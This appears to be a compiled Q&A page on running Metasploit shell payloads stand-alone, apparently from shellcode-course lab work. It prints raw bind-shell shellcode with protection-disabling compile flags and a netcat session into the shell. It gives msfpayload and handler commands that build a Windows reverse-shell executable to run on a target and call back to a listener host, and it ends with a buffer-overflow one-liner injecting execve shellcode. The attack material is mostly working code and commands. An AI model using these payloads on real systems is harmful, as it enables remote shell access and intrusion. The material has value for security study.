How to Run The Linux/X86/Shell_Bind_Tcp Payload Stand Alone

How to run the linux/x86/shell_bind_tcp payload stand alone?

Generate shellcode, compile and run:

max@ubuntu-vm:~/SLAE/mod2$ sudo msfpayload -p linux/x86/shell_bind_tcp C
/*
 * linux/x86/shell_bind_tcp - 78 bytes
 * http://www.metasploit.com
 * VERBOSE=false, LPORT=4444, RHOST=, PrependFork=false, 
 * PrependSetresuid=false, PrependSetreuid=false, 
 * PrependSetuid=false, PrependSetresgid=false, 
 * PrependSetregid=false, PrependSetgid=false, 
 * PrependChrootBreak=false, AppendExit=false, 
 * InitialAutoRunScript=, AutoRunScript=
 */
unsigned char buf[] = 
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x5b\x5e\x52\x68\x02\x00\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a"
"\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0"
"\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f"
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0"
"\x0b\xcd\x80";
max@ubuntu-vm:~/SLAE/mod2$ gcc -fno-stack-protector -z execstack -o shellcode shellcode.c
max@ubuntu-vm:~/SLAE/mod2$ ./shellcode 
Shellcode Length:  20

Now, in terminal 2. Check for connections and finally connect using netcat. Note, that the $ doesn't appear but the shell is still there:

max@ubuntu-vm:~$ sudo netstat -ntlp 
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address     Foreign Address     State       PID/Program name
tcp        0      0 0.0.0.0:4444      0.0.0.0:*           LISTEN      3326/shellcode    
max@ubuntu-vm:~$ nc 0.0.0.0 4444
pwd
/home/max/SLAE/mod2
whoami
max
ls -l
total 516
-rwxrwxr-x 1 max max    591 Jan  2 07:06 InsertionEncoder.py
-rwxrwxr-x 1 max max    591 Jan  2 07:03 InsertionEncoder.py~
-rwxrwxr-x 1 max max    471 Dec 30 17:00 NOTEncoder.py
-rwxrwxr-x 1 max max    471 Dec 30 16:57 NOTEncoder.py~
-rwxrwxr-x 1 max max    442 Jan  2 09:58 XOREncoder.py
-rwxrwxr-x 1 max max    442 Dec 30 08:36 XOREncoder.py~
-rwxrwxr-x 1 max max    139 Dec 27 08:18 compile.sh

How to run the linux/x86/shell_reverse_tcp payload stand alone?

It's a reverse_shell, it needs something to connect to.

You have to configure and create a reverse_handler, something like this:

# msfcli exploit/multi/handler PAYLOAD=linux/x86/shell_reverse_tcp LHOST=10.0.1.38 LPORT=3333 E

Standalone multi/handler reverse_tcp

I don't really know what your constraints/restrictions are.

My guess is that, you want to "receive shells" on a computer without metasploit installed on it.
If that's the case, you could use msfd(metasploit daemon installed on a different computer) or simply netcat,socat,...

What do you think of this:

• listening with netcat on 192.168.1.2
  # nc -l -p 4444
• Using a shell_reverse_tcp instead
  # msfpayload windows/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 X /root/darkbird.exe
• Execute darkbird.exe on the target

execute run -jz once for multiple connections

Found the solution: execute "set ExitOnSession false" before "run -jz". that's what I need.

Exploit Development - GETS and Shellcode

When the shellcode execve(/bin/sh) executes, it has no connected standard input (because of GETS) and will terminate.

The solution is to close stdin descriptor, reopen /dev/tty before executing /bin/sh.

#include <unistd.h>
#include <stdio.h>
#include <sys/fcntl.h>

int main(void) {
    char buf[50];
    gets(buf);
    printf("Yo %s\n", buf);
    close(0);
    open("/dev/tty", O_RDWR | O_NOCTTY);
    execve ("/bin/sh", NULL, NULL);
}

Related answer: execve("/bin/sh", 0, 0); in a pipe

It is also possible to execute the payload by using

( python -c "print 'A'*62 + '\x35\x56\x55\x56' + '\x31\xc0\x99\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80'"; cat ) | ./vuln

---

Related Topics